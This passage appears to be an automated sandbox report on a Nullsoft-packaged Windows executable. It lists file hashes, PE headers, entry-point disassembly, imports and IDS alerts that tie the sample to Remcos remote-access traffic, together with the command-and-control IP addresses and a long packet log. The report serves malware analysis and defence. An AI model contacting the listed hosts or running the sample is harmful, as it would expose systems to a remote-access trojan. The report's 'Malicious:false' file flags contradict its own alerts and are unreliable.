                                    SHA-512:6DE9F14B990B44336B01DF665F6D1C46B6076C10F1CC40D45DAA009110D9BA51E871599422E486E7264FE251EC560E9922CB959DAE6C6B12CC8B6AF6D720C581
                                    Malicious:false
                                    Preview:..|.....K.............................................................................................{...................................................(......................A............M......................(........W...t..............e............................................................<.....................................................................s.............................................................................................................................L.............................B............/............................................................../..............................w..[......................_.............................................................................T.............o.(....%.........................................n.........J.....................................E.....=...............................................................B......................................y...................................k....
                                    Process:C:\Users\user\Desktop\SDWLLRJcsY.exe
                                    File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                    Category:dropped
                                    Size (bytes):1228
                                    Entropy (8bit):3.1240329365347503
                                    Encrypted:false
                                    SSDEEP:24:8VLDaRMgKkICFl9afr8WLJQlFw49HAvqy:8tmRPICX9afHJQ3wiASy
                                    MD5:258C061BB78A2284DFDB9203CE07908D
                                    SHA1:2F8F8FAB83C2CB6DE9C7CA1892C7BA9F56E05CD8
                                    SHA-256:55C70FCDD11D5A5A486368B8317D64DC1EED857E58B8F1ADE4555A5B54CBAE6E
                                    SHA-512:C7994CD9535FA32709434723B44278E182193D97D748661705A77C4F78A0008AFC640F8595085915C3209E2AF834A0958EDC02DDE661E893012BC963E37681C5
                                    Malicious:false
                                    Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....P.1...........Local.<............................................L.o.c.a.l.....N.1...........Temp..:............................................T.e.m.p.....b.1...........nsy4F91.tmp.H............................................n.s.y.4.F.9.1...t.m.p.....\.2...........cueca.Stu.D............................................c.u.e.c.a...S.t.u.......7.....\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.n.s.y.4.F.9.1...t.m.p.\.c.u.e.c.a...S.t.u.a.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.i.n.t.e.r.c.e.s.s.i.o.n.a.t.e.\.F.a.v.o.u.r.a.b.l.i.e.s.1.1.7.\.s.u.l.f.o.n.y.l.u.r.e.a.\.H.y.p.e.r.t.r.a
                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                    Entropy (8bit):6.308705975745299
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:SDWLLRJcsY.exe
                                    File size:995'120 bytes
                                    MD5:7bd1cce43f6b48c8ddd492e5711fd17f
                                    SHA1:3f650d8993c542682aa61c725ea1bb4ee93d259a
                                    SHA256:c5636797b8bad3e9ff18f51d269ace0948112d9ff03a9900a174687fec4bae3b
                                    SHA512:fe804b78cd734192664366364b099a5676d58101b9fe03c40c925cfe1cc202a99e04094d0fa93338ed831015d7ccd2ede88f04ab3cf6410542853a5a228face2
                                    SSDEEP:12288:5Ly0SryvXRpHnez0SBkasZa0kITLwn096zdZEkINz3WSV3:5Ly0SG/zHMBbsZadi80qZgNz3R
                                    TLSH:5F25F1663178B0CAE456D6351BC4D229A1B4BD782A43926FF3507FFF76BC6469E00342
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...'.uY.................d...*.....
                                    Icon Hash:71ec71330f4c2a18
                                    Entrypoint:0x40333d
                                    Entrypoint Section:.text
                                    Digitally signed:true
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x59759527 [Mon Jul 24 06:35:19 2017 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:4
                                    OS Version Minor:0
                                    File Version Major:4
                                    File Version Minor:0
                                    Subsystem Version Major:4
                                    Subsystem Version Minor:0
                                    Import Hash:b34f154ec913d2d2c435cbd644e91687
                                    Signature Valid:false
                                    Signature Issuer:CN="galea Liniefring ", E=Counterreprisal@commutableness.Hea, L=Saint-Hilaire-le-Grand, S=Grand Est, C=FR
                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                    Error Number:-2146762487
                                    Not Before, Not After
                                    • 10/09/2024 09:37:23 10/09/2027 09:37:23
                                    Subject Chain
                                    • CN="galea Liniefring ", E=Counterreprisal@commutableness.Hea, L=Saint-Hilaire-le-Grand, S=Grand Est, C=FR
                                    Version:3
                                    Thumbprint MD5:95094CFBC63950E622AF1DFA6E758BD4
                                    Thumbprint SHA-1:48CE990AD29052E08E3200782F14F6B1EA0BAF7B
                                    Thumbprint SHA-256:A894E260F24722C1EEAF481A679E2D1375BE7D492C7C40DA2FF499E39ECAD2D0
                                    Serial:25BB7BE24444D924A0C091C26ACFC904CB17432E
                                    Instruction
                                    sub esp, 000002D4h
                                    push ebx
                                    push esi
                                    push edi
                                    push 00000020h
                                    pop edi
                                    xor ebx, ebx
                                    push 00008001h
                                    mov dword ptr [esp+14h], ebx
                                    mov dword ptr [esp+10h], 0040A2E0h
                                    mov dword ptr [esp+1Ch], ebx
                                    call dword ptr [004080A8h]
                                    call dword ptr [004080A4h]
                                    and eax, BFFFFFFFh
                                    cmp ax, 00000006h
                                    mov dword ptr [0042A20Ch], eax
                                    je 00007FC3A8C1CB43h
                                    push ebx
                                    call 00007FC3A8C1FDD9h
                                    cmp eax, ebx
                                    je 00007FC3A8C1CB39h
                                    push 00000C00h
                                    call eax
                                    mov esi, 004082B0h
                                    push esi
                                    call 00007FC3A8C1FD53h
                                    push esi
                                    call dword ptr [00408150h]
                                    lea esi, dword ptr [esi+eax+01h]
                                    cmp byte ptr [esi], 00000000h
                                    jne 00007FC3A8C1CB1Ch
                                    push 0000000Ah
                                    call 00007FC3A8C1FDACh
                                    push 00000008h
                                    call 00007FC3A8C1FDA5h
                                    push 00000006h
                                    mov dword ptr [0042A204h], eax
                                    call 00007FC3A8C1FD99h
                                    cmp eax, ebx
                                    je 00007FC3A8C1CB41h
                                    push 0000001Eh
                                    call eax
                                    test eax, eax
                                    je 00007FC3A8C1CB39h
                                    or byte ptr [0042A20Fh], 00000040h
                                    push ebp
                                    call dword ptr [00408044h]
                                    push ebx
                                    call dword ptr [004082A0h]
                                    mov dword ptr [0042A2D8h], eax
                                    push ebx
                                    lea eax, dword ptr [esp+34h]
                                    push 000002B4h
                                    push eax
                                    push ebx
                                    push 004216A8h
                                    call dword ptr [00408188h]
                                    push 0040A2C8h
                                    Programming Language:
                                    • [EXP] VC++ 6.0 SP5 build 8804
                                    Name | Virtual Address | Virtual Size | Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0x84fc | 0xa0 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x5c000 | 0x6c2d0 | .rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0xf2558 | 0x9d8 |
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                    .text | 0x1000 | 0x626d | 0x6400 | b2dd5d917f94d75528a11411abe5681c | False | 0.6569921875 | data | 6.423132440637118 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata | 0x8000 | 0x138e | 0x1400 | 2914bac53cd4485c9822093463e4eea6 | False | 0.4509765625 | data | 5.146454805063938 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data | 0xa000 | 0x20318 | 0x600 | c46c24ddc9bf88a6774bd207204164b9 | False | 0.4921875 | data | 3.906531854842304 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .ndata | 0x2b000 | 0x31000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc | 0x5c000 | 0x6c2d0 | 0x6c400 | 4f3d39c7e86d8cf2186d2c5dc01043a3 | False | 0.22987559540993072 | data | 3.0219143577609104 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                    RT_ICON | 0x5c478 | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 270336 | English | United States | 0.18922167648016097
                                    RT_ICON | 0x9e4a0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.24856559801253994
                                    RT_ICON | 0xaecc8 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.29340971200336347
                                    RT_ICON | 0xb8170 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.31090573012939005
                                    RT_ICON | 0xbd5f8 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.30196032120925836
                                    RT_ICON | 0xc1820 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.3432572614107884
                                    RT_ICON | 0xc3dc8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.36843339587242024
                                    RT_ICON | 0xc4e70 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.4906716417910448
                                    RT_ICON | 0xc5d18 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.6137184115523465
                                    RT_ICON | 0xc65c0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | United States | 0.3
                                    RT_ICON | 0xc6c28 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.3764450867052023
                                    RT_ICON | 0xc7190 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.4920212765957447
                                    RT_ICON | 0xc75f8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.3897849462365591
                                    RT_ICON | 0xc78e0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.5135135135135135
                                    RT_DIALOG | 0xc7a08 | 0x100 | data | English | United States | 0.5234375
                                    RT_DIALOG | 0xc7b08 | 0x11c | data | English | United States | 0.6056338028169014
                                    RT_DIALOG | 0xc7c28 | 0xc4 | data | English | United States | 0.5918367346938775
                                    RT_DIALOG | 0xc7cf0 | 0x60 | data | English | United States | 0.7291666666666666
                                    RT_GROUP_ICON | 0xc7d50 | 0xca | data | English | United States | 0.6237623762376238
                                    RT_VERSION | 0xc7e20 | 0x16c | data | English | United States | 0.5769230769230769
                                    RT_MANIFEST | 0xc7f90 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
                                    DLL | Import
                                    KERNEL32.dll | SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                    USER32.dll | GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                    GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                    SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                    ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                    COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                    ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                    Language of compilation system | Country where language is spoken | Map
                                    English | United States |
                                    Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                    2024-09-25T16:01:27.983317+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 64858 | 185.26.107.57 | 80 | TCP
                                    2024-09-25T16:01:30.828582+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 64860 | 107.173.4.16 | 2404 | TCP
                                    2024-09-25T16:01:32.079186+0200 | 2803304 | ETPRO MALWARE Common Downloader Header Pattern HCa | 3 | 192.168.2.4 | 64861 | 178.237.33.50 | 80 | TCP
                                    2024-09-25T16:01:32.094273+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 64862 | 107.173.4.16 | 2404 | TCP
                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Sep 25, 2024 16:01:27.339128971 CEST | 64858 | 80 | 192.168.2.4 | 185.26.107.57
                                    Sep 25, 2024 16:01:27.344007015 CEST | 80 | 64858 | 185.26.107.57 | 192.168.2.4
                                    Sep 25, 2024 16:01:27.344082117 CEST | 64858 | 80 | 192.168.2.4 | 185.26.107.57
                                    Sep 25, 2024 16:01:27.344324112 CEST | 64858 | 80 | 192.168.2.4 | 185.26.107.57
                                    Sep 25, 2024 16:01:27.349117041 CEST | 80 | 64858 | 185.26.107.57 | 192.168.2.4
                                    Sep 25, 2024 16:01:27.983258963 CEST | 80 | 64858 | 185.26.107.57 | 192.168.2.4
                                    Sep 25, 2024 16:01:27.983282089 CEST | 80 | 64858 | 185.26.107.57 | 192.168.2.4
                                    Sep 25, 2024 16:01:27.983316898 CEST | 64858 | 80 | 192.168.2.4 | 185.26.107.57
                                    Sep 25, 2024 16:01:27.983360052 CEST | 64858 | 80 | 192.168.2.4 | 185.26.107.57
                                    Sep 25, 2024 16:01:27.983561039 CEST | 64858 | 80 | 192.168.2.4 | 185.26.107.57
                                    Sep 25, 2024 16:01:27.988339901 CEST | 80 | 64858 | 185.26.107.57 | 192.168.2.4
                                    Sep 25, 2024 16:01:27.993041039 CEST | 64859 | 443 | 192.168.2.4 | 185.26.107.57
                                    Sep 25, 2024 16:01:27.993088961 CEST | 443 | 64859 | 185.26.107.57 | 192.168.2.4
                                    Sep 25, 2024 16:01:27.993160963 CEST | 64859 | 443 | 192.168.2.4 | 185.26.107.57
                                    Sep 25, 2024 16:01:28.013062954 CEST | 64859 | 443 | 192.168.2.4 | 185.26.107.57
                                    Sep 25, 2024 16:01:28.013081074 CEST | 443 | 64859 | 185.26.107.57 | 192.168.2.4
                                    Sep 25, 2024 16:01:28.664256096 CEST | 443 | 64859 | 185.26.107.57 | 192.168.2.4
                                    Sep 25, 2024 16:01:28.664370060 CEST | 64859 | 443 | 192.168.2.4 | 185.26.107.57
                                    Sep 25, 2024 16:01:28.747118950 CEST | 64859 | 443 | 192.168.2.4 | 185.26.107.57
                                    Sep 25, 2024 16:01:28.747159004 CEST | 443 | 64859 | 185.26.107.57 | 192.168.2.4
                                    Sep 25, 2024 16:01:28.747524023 CEST | 443 | 64859 | 185.26.107.57 | 192.168.2.4
                                    Sep 25, 2024 16:01:28.748568058 CEST | 64859 | 443 | 192.168.2.4 | 185.26.107.57
                                    Sep 25, 2024 16:01:28.752832890 CEST | 64859 | 443 | 192.168.2.4 | 185.26.107.57
                                    Sep 25, 2024 16:01:28.795430899 CEST | 443 | 64859 | 185.26.107.57 | 192.168.2.4
                                    Sep 25, 2024 16:01:29.029697895 CEST | 443 | 64859 | 185.26.107.57 | 192.168.2.4
                                    Sep 25, 2024 16:01:29.029725075 CEST | 443 | 64859 | 185.26.107.57 | 192.168.2.4
                                    Sep 25, 2024 16:01:29.029742002 CEST | 443 | 64859 | 185.26.107.57 | 192.168.2.4
                                    Sep 25, 2024 16:01:29.029880047 CEST | 64859 | 443 | 192.168.2.4 | 185.26.107.57
                                    Sep 25, 2024 16:01:29.029901028 CEST | 443 | 64859 | 185.26.107.57 | 192.168.2.4
                                    Sep 25, 2024 16:01:29.029983044 CEST | 64859 | 443 | 192.168.2.4 | 185.26.107.57
                                    Sep 25, 2024 16:01:29.031088114 CEST | 443 | 64859 | 185.26.107.57 | 192.168.2.4
                                    Sep 25, 2024 16:01:29.031104088 CEST | 443 | 64859 | 185.26.107.57 | 192.168.2.4
                                    Sep 25, 2024 16:01:29.031220913 CEST | 64859 | 443 | 192.168.2.4 | 185.26.107.57
                                    Sep 25, 2024 16:01:29.031230927 CEST | 443 | 64859 | 185.26.107.57 | 192.168.2.4
                                    Sep 25, 2024 16:01:29.035407066 CEST | 64859 | 443 | 192.168.2.4 | 185.26.107.57
                                    Sep 25, 2024 16:01:29.119673967 CEST | 443 | 64859 | 185.26.107.57 | 192.168.2.4
                                    Sep 25, 2024 16:01:29.119700909 CEST | 443 | 64859 | 185.26.107.57 | 192.168.2.4
                                    Sep 25, 2024 16:01:29.119779110 CEST | 64859 | 443 | 192.168.2.4 | 185.26.107.57
                                    Sep 25, 2024 16:01:29.119792938 CEST | 443 | 64859 | 185.26.107.57 | 192.168.2.4
                                    Sep 25, 2024 16:01:29.119841099 CEST | 64859 | 443 | 192.168.2.4 | 185.26.107.57
                                    Sep 25, 2024 16:01:29.121660948 CEST | 443 | 64859 | 185.26.107.57 | 192.168.2.4
                                    Sep 25, 2024 16:01:29.121680975 CEST | 443 | 64859 | 185.26.107.57 | 192.168.2.4
                                    Sep 25, 2024 16:01:29.121803999 CEST | 64859 | 443 | 192.168.2.4 | 185.26.107.57
                                    Sep 25, 2024 16:01:29.121803999 CEST | 64859 | 443 | 192.168.2.4 | 185.26.107.57
                                    Sep 25, 2024 16:01:29.121812105 CEST | 443 | 64859 | 185.26.107.57 | 192.168.2.4
                                    Sep 25, 2024 16:01:29.122613907 CEST | 443 | 64859 | 185.26.107.57 | 192.168.2.4
                                    Sep 25, 2024 16:01:29.122632980 CEST | 443 | 64859 | 185.26.107.57 | 192.168.2.4
                                    Sep 25, 2024 16:01:29.122675896 CEST | 64859 | 443 | 192.168.2.4 | 185.26.107.57
                                    Sep 25, 2024 16:01:29.122683048 CEST | 443 | 64859 | 185.26.107.57 | 192.168.2.4
                                    Sep 25, 2024 16:01:29.122745037 CEST | 64859 | 443 | 192.168.2.4 | 185.26.107.57
                                    Sep 25, 2024 16:01:29.122745037 CEST | 64859 | 443 | 192.168.2.4 | 185.26.107.57
                                    Sep 25, 2024 16:01:29.124519110 CEST | 443 | 64859 | 185.26.107.57 | 192.168.2.4
                                    Sep 25, 2024 16:01:29.124546051 CEST | 443 | 64859 | 185.26.107.57 | 192.168.2.4
                                    Sep 25, 2024 16:01:29.124603987 CEST | 64859 | 443 | 192.168.2.4 | 185.26.107.57
                                    Sep 25, 2024 16:01:29.124609947 CEST | 443 | 64859 | 185.26.107.57 | 192.168.2.4
                                    Sep 25, 2024 16:01:29.125325918 CEST | 64859 | 443 | 192.168.2.4 | 185.26.107.57
                                    Sep 25, 2024 16:01:29.210115910 CEST | 443 | 64859 | 185.26.107.57 | 192.168.2.4
                                    Sep 25, 2024 16:01:29.210140944 CEST | 443 | 64859 | 185.26.107.57 | 192.168.2.4
                                    Sep 25, 2024 16:01:29.210228920 CEST | 64859 | 443 | 192.168.2.4 | 185.26.107.57
                                    Sep 25, 2024 16:01:29.210242033 CEST | 443 | 64859 | 185.26.107.57 | 192.168.2.4
                                    Sep 25, 2024 16:01:29.210279942 CEST | 64859 | 443 | 192.168.2.4 | 185.26.107.57
                                    Sep 25, 2024 16:01:29.210299015 CEST | 64859 | 443 | 192.168.2.4 | 185.26.107.57
                                    Sep 25, 2024 16:01:29.211791992 CEST | 443 | 64859 | 185.26.107.57 | 192.168.2.4
                                    Sep 25, 2024 16:01:29.211808920 CEST | 443 | 64859 | 185.26.107.57 | 192.168.2.4
                                    Sep 25, 2024 16:01:29.211963892 CEST | 64859 | 443 | 192.168.2.4 | 185.26.107.57
                                    Sep 25, 2024 16:01:29.211971998 CEST | 443 | 64859 | 185.26.107.57 | 192.168.2.4
                                    Sep 25, 2024 16:01:29.212059975 CEST | 64859 | 443 | 192.168.2.4 | 185.26.107.57
                                    Sep 25, 2024 16:01:29.212683916 CEST | 443 | 64859 | 185.26.107.57 | 192.168.2.4
                                    Sep 25, 2024 16:01:29.212699890 CEST | 443 | 64859 | 185.26.107.57 | 192.168.2.4
                                    Sep 25, 2024 16:01:29.212748051 CEST | 443 | 64859 | 185.26.107.57 | 192.168.2.4
                                    Sep 25, 2024 16:01:29.212754965 CEST | 64859 | 443 | 192.168.2.4 | 185.26.107.57
                                    Sep 25, 2024 16:01:29.212759972 CEST | 443 | 64859 | 185.26.107.57 | 192.168.2.4
                                    Sep 25, 2024 16:01:29.212788105 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.212804079 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.212810993 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.212851048 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.212851048 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.213463068 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.213476896 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.213529110 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.213535070 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.213782072 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.214307070 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.214322090 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.214369059 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.214375019 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.214390993 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.214591980 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.299204111 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.299230099 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.299319983 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.299333096 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.299345016 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.299401045 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.300746918 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.300770044 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.300870895 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.300878048 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.300986052 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.302265882 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.302282095 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.302340984 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.302347898 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.302385092 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.302385092 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.302963972 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.303025007 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.303071976 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.303072929 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.303082943 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.303175926 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.303175926 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.303245068 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.303293943 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.303374052 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.303394079 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.303409100 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.303423882 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.303529024 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.303576946 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.303608894 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.303615093 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.303661108 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.303661108 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.303674936 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.303718090 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.303745031 CEST64859443192.168.2.4185.26.107.57
                                    Sep 25, 2024 16:01:29.303751945 CEST44364859185.26.107.57192.168.2.4
                                    Sep 25, 2024 16:01:29.303780079 CEST64859443192.168.2.4185.26.107.57
